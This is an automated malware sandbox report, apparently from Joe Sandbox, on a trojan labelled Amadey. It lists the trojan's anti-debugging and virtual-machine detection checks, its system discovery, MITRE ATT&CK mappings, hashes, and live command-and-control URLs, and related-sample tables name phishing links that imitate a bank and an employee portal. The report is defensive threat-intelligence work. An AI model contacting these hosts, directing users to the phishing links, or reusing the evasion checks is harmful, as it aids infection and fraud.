Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742046B second address: 7420471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420471 second address: 7420475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74201F9 second address: 742020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7110h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742020D second address: 7420246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE9093D6546h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE9093D653Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420246 second address: 7420258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420258 second address: 742025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742025C second address: 7420282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE908EE7119h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420282 second address: 7420288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420288 second address: 742028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742028E second address: 7420292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420292 second address: 74202EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, 10B7h 0x0000000f pushad 0x00000010 jmp 00007FE908EE7119h 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a jmp 00007FE908EE710Eh 0x0000001f and dword ptr [eax], 00000000h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE908EE7117h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B020E second address: 73B022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B036F second address: 73B0375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B0375 second address: 73B03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE9093D6540h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 call 00007FE9093D653Dh 0x00000019 pushfd 0x0000001a jmp 00007FE9093D6540h 0x0000001f sbb si, F468h 0x00000024 jmp 00007FE9093D653Bh 0x00000029 popfd 0x0000002a pop esi 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d jmp 00007FE9093D653Fh 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov ebx, 086EEE86h 0x0000003c movsx edi, si 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73B03E8 second address: 73B03EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F28 second address: 73A0F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F2C second address: 73A0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F32 second address: 73A0F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D653Ch 0x00000009 add esi, 61C22F88h 0x0000000f jmp 00007FE9093D653Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE9093D6548h 0x0000001b xor eax, 352C11E8h 0x00000021 jmp 00007FE9093D653Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FE9093D6545h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0F9A second address: 73A0FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: F80B41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: F80A77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: 111EB7C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: F7E62A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: 1127495 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Special instruction interceptor: First address: 11ACA36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Code function: 0_2_00A19980 rdtsc 0_2_00A19980
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Code function: 0_2_0083255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0083255D
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Code function: 0_2_008329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008329FF
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: yqUQPPp0LM.exe, 00000000.00000003.2352649289.0000000006C91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: isY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'iL
Source: yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH"?
Source: yqUQPPp0LM.exe Binary or memory string: Hyper-V RAW
Source: yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: yqUQPPp0LM.exe, 00000000.00000003.2350886890.0000000001B32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe File opened: NTICE
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe File opened: SICE
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe File opened: SIWVID
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Code function: 0_2_00A19980 rdtsc 0_2_00A19980
Source: yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PProgram Manager
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\yqUQPPp0LM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.12:49713 -> 91.149.241.220:80

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
yqUQPPp0LM.exe | 46% | Virustotal |
yqUQPPp0LM.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
yqUQPPp0LM.exe | 100% | Avira | TR/Crypt.TPM.Gen
yqUQPPp0LM.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://home.fortth14vs.top/gduZ | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZE_.u | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fortth14vs.top | 91.149.241.220 | true | false | | high
httpbin.org | 34.197.122.172 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | yqUQPPp0LM.exe | false | | high
https://httpbin.org/ipbefore | yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | yqUQPPp0LM.exe | false | | high
http://home.fortth14vs.top/gduZ | yqUQPPp0LM.exe, yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4 | yqUQPPp0LM.exe, 00000000.00000002.2471420475.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | yqUQPPp0LM.exe | false | | high
https://curl.se/docs/alt-svc.html | yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZE_.u | yqUQPPp0LM.exe, 00000000.00000003.2450041018.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2471759020.0000000001B98000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449395004.0000000001B81000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449644012.0000000001B94000.00000004.00000020.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000003.2449418241.0000000001B8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.jpg | yqUQPPp0LM.exe, 00000000.00000003.2333260080.00000000076EF000.00000004.00001000.00020000.00000000.sdmp, yqUQPPp0LM.exe, 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
91.149.241.220 | home.fortth14vs.top | Poland | 41952 | MARTON-ASPL | false
34.197.122.172 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582700
                            Start date and time:2024-12-31 09:44:37 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 7s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:yqUQPPp0LM.exe
                            renamed because original name is a hash value
                            Original Sample Name:00dacdc02143f49ba6542161592fea9d.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 52%
                            • Number of executed functions: 97
                            • Number of non-executed functions: 59
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.12.23.50
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.149.241.220 | ZN34wF8WI2.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
 | Hqle5OSmLQ.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.197.122.172 | ZN34wF8WI2.exe | malicious | Unknown |
 | Hqle5OSmLQ.exe | malicious | Unknown |
 | Set-up.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fortth14vs.top | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
 | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
httpbin.org | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
 | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
 | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
 | Set-up.exe | malicious | Unknown | 52.202.253.164
 | Set-up.exe | malicious | Unknown | 34.197.122.172
 | Set-up.exe | malicious | Unknown | 52.73.63.247
 | a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
 | SgMuuLxOCJ.exe | malicious | LummaC | 34.226.108.155
 | TNyOrM6mIM.exe | malicious | LummaC | 3.218.7.103
 | FIyDwZM4OR.exe | malicious | Unknown | 3.218.7.103
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MARTON-ASPL | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
 | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
 | mips.elf | malicious | Unknown | 91.149.238.18
 | ppc.elf | malicious | Unknown | 91.149.238.18
 | mpsl.elf | malicious | Unknown | 91.149.238.18
 | arm5.elf | malicious | Unknown | 91.149.238.18
 | arm7.elf | malicious | Unknown | 91.149.238.18
 | harm4.elf | malicious | Unknown | 91.149.238.18
 | harm5.elf | malicious | Unknown | 91.149.238.18
 | harm4.elf | malicious | Unknown | 91.149.238.18
AMAZON-AESUS | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
 | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
 | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
 | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
 | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
 | Set-up.exe | malicious | Unknown | 52.202.253.164
 | kwari.mips.elf | malicious | Unknown | 54.226.65.111
 | Set-up.exe | malicious | Unknown | 34.197.122.172
 | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 3.88.121.169
 | https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857 | malicious | KnowBe4 | 3.88.121.169
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):7.984789855787688
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • VXD Driver (31/22) 0.00%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:yqUQPPp0LM.exe
                                  File size:4'472'832 bytes
                                  MD5:00dacdc02143f49ba6542161592fea9d
                                  SHA1:cf9c6420db557dad6b86ca800d14cb8cba120657
                                  SHA256:be0554ab88f46d8e6b10243d7b28ae2ce724b43224af3954b62d015693089822
                                  SHA512:059c24fb495e88cba52cf4e8a1bbf7c73b6c6cf20cc45be410d6d8f63b9ee025908e2e3043614bbbb88eec25aca828d5647ca38ee8d0e0426c78445b22b61959
                                  SSDEEP:98304:M8T+aX+AvfAfY4Unal3z18I0+qzN9dDDR1M0hIozLjLdHN5w99xX4NfBfl:1yaXRfAfYvo3z90+w/dDLMenbLli9pUp
                                  TLSH:5F2633922FFB4376ECADEC7E04D07F9D71E173264896E09CDC947D5887530A272A248A
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...`........M...@..................................PD...@... ............................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x1096000
                                  Entrypoint Section:.taggant
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE
                                  Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Signature Valid:
                                  Signature Issuer:
                                  Signature Validation Error:
                                  Error Number:
                                  Not Before, Not After
                                    Subject Chain
                                      Version:
                                      Thumbprint MD5:
                                      Thumbprint SHA-1:
                                      Thumbprint SHA-256:
                                      Serial:
                                      Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
